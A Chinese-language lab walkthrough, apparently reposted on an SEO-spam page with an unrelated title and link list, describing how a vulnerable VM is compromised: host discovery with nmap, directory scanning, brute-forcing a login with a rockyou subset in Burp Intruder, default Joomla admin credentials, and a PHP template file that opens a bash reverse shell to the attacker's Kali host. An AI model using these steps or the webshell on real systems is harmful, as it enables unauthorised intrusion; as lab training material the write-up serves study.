当前位置: 首页 > wzjs >正文

游戏网页界面设计常州seo外包公司

游戏网页界面设计,常州seo外包公司,佛山设计公司,沪尚茗居上海门店地址1.开启靶机,确保网络适配器是NAT网段 2.借助kali虚拟机来确定该靶机的IP地址为192.168.139.169 nmap -O 192.168.139.1/24 3.访问该IP地址 4.访问robots.txt,什么也没有 5.扫描目录 dirb http://192.168.139.169 6.访问一下secret.txt 7.访问phpinfo.p…

1.开启靶机,确保网络适配器是NAT网段

2.借助kali虚拟机来确定该靶机的IP地址为192.168.139.169

nmap -O 192.168.139.1/24

3.访问该IP地址

4.访问robots.txt,什么也没有

5.扫描目录

dirb http://192.168.139.169

6.访问一下secret.txt

7.访问phpinfo.php

8.访问8080,尝试爆破这个密码

9.打开BP抓包,发现是base64编码

10.在secret.txt发现一些有用信息,要在kali里面进行操作

cd /usr/share/wordlists
ls
gzip -d /usr/share/wordlists/rockyou.txt.gz
cat rockyou.txt
复制字典的前一百个生成一个txt,后面爆破用。

11.打开BP进行抓包,抓8080端口的包

12.发送到Intrder模块进行爆破,开始攻击

爆破出状态码200,然后解码,账号密码为joker:hannah

13.进行登录

14.登陆成功可以发现该网站是由joomla架构,尝试使用默认账号密码joomla

15.点击后台管理系统

16.用户名和密码joomla

17.可以看到这是他网站的一些模板

18.这里可以新建文件

19.新建666.php写入木马,利用菜刀或者蚁剑进行链接

<?phpexec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.139.142/5555 0>&1'");?>

20.利用kali监听

21.访问http://192.168.139.169:8080/templates/beez3/666.php

回到kali查看是否监听到

http://www.dtcms.com/wzjs/9653.html

相关文章:

  • 城口网站建设推广普通话宣传语手抄报
  • 西安做网站服务qq营销
  • 海洋公司做网站推广google登录入口
  • 网站开发工程师 招聘武汉seo广告推广
  • 听完米课做的网站网站制作教程
  • 微信公众号开发是否需要建立网站楼市最新消息
  • 家装设计网站大全wordpress建站
  • 怎么做存储网站大数据推广公司
  • 长沙公司网站开发最佳的资源磁力搜索引擎
  • 做网站什么都不懂 怎么做站长工具seo综合查询分析
  • 英迈思网站做不下去可以退款吗文职培训机构前十名
  • wordpress配置smtp邮箱运营seo是什么意思
  • 网站代理建设李勇seo博客
  • 广州正规网站建设公司国外搜索引擎大全不屏蔽
  • 医药网站建设需要注意点技能培训
  • 网站建设的banner图拓客最有效方案
  • 体育新闻最新消息世界杯南昌seo推广公司
  • 虎门专业做网站公司最好的优化公司
  • 网站开发实训设计报告电商网站定制开发
  • 网站注册域名查询短视频营销推广方案
  • 英文二手汽车网站建设微信运营技巧
  • 海口网站建设介绍佛山竞价账户托管
  • 做类似淘宝一样的网站百度店铺注册
  • 欧普设计家官网广东网站seo策划
  • 任何判断网站SEO做的好坏seo从零开始到精通200讲解
  • 毕业设计网站开发实施步骤怎么学做电商然后自己创业
  • 网站如何备案 流程深圳网络公司推广平台
  • 济宁教育平台网站建设成都网站建设制作公司
  • 深圳做网站设计的公司网页制作流程
  • 一级a做爰片51网站seo服务如何收费